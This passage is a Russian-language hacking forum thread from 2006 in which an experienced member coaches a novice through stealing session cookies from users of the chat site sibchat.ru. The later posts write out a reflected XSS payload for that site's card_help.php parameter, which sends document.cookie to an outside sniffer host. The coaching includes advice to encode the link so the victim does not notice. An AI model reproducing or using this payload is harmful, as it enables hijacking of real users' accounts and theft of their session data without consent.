Чаты найти уязвимости чата http://sibchat.ru

Discussion in 'Веб-уязвимости' started by Trentemoller, 22 Sep 2006.

  1. Trentemoller

    Trentemoller New Member

    Joined:
    15 Sep 2006
    Messages:
    13
    Likes Received:
    0
    Reputations:
    0
    Опа что-то новое такого я не слышал, попрошу пжалста обьяснитья чайнику...
     
  2. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,571
    Likes Received:
    977
    Reputations:
    783
  3. Trentemoller

    Trentemoller New Member

    Joined:
    15 Sep 2006
    Messages:
    13
    Likes Received:
    0
    Reputations:
    0
    Обьясинте пожалуйста, как куки то отправить со сниффером?
     
  4. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,571
    Likes Received:
    977
    Reputations:
    783
    Прочитай на второй странице мой пост, умник;)
    Ничего не надо отправлять. Делай то что я написал на второй странице.
     
  5. Trentemoller

    Trentemoller New Member

    Joined:
    15 Sep 2006
    Messages:
    13
    Likes Received:
    0
    Reputations:
    0
    Это получается надо только отправить ссылку на сниффер? юрез по ней зайдёт, и его id в логе?
     
  6. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,571
    Likes Received:
    977
    Reputations:
    783
    Не ссылку на снифер. А тот полный запрос, который я привёл. Вместе со <script> и т.д. И дал ссылку на скрипт от Дрона, зашифруешь ссылку, что бы он ничего не просёк. Хватит спрашивать, просто пробуй.
     
  7. Trentemoller

    Trentemoller New Member

    Joined:
    15 Sep 2006
    Messages:
    13
    Likes Received:
    0
    Reputations:
    0
    После этого сниффера, что должно произойти?, я отправляю вроде заходят по ссылке, нов логе даже сайт не указан не говоря уже про Query там вообще ни чего нету
     
    #27 Trentemoller, 25 Sep 2006
    Last edited: 25 Sep 2006
  8. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,571
    Likes Received:
    977
    Reputations:
    783
    Ты отправлял http://antichat.ru/cgi-bin/s.jpg ?
    Или http://www.sibchat.ru/card_help.php?sid="><script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg"+document.cookie;</script> ?
     
  9. Trentemoller

    Trentemoller New Member

    Joined:
    15 Sep 2006
    Messages:
    13
    Likes Received:
    0
    Reputations:
    0
    Slip, ну что там я правильно всё сделал? Я отправлял в поле сообщение вот это http://www.sibchat.ru/card_help.php?sid="><script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg"+document.cookie;</script> кому отправлял он заходил, но в логе ни чего.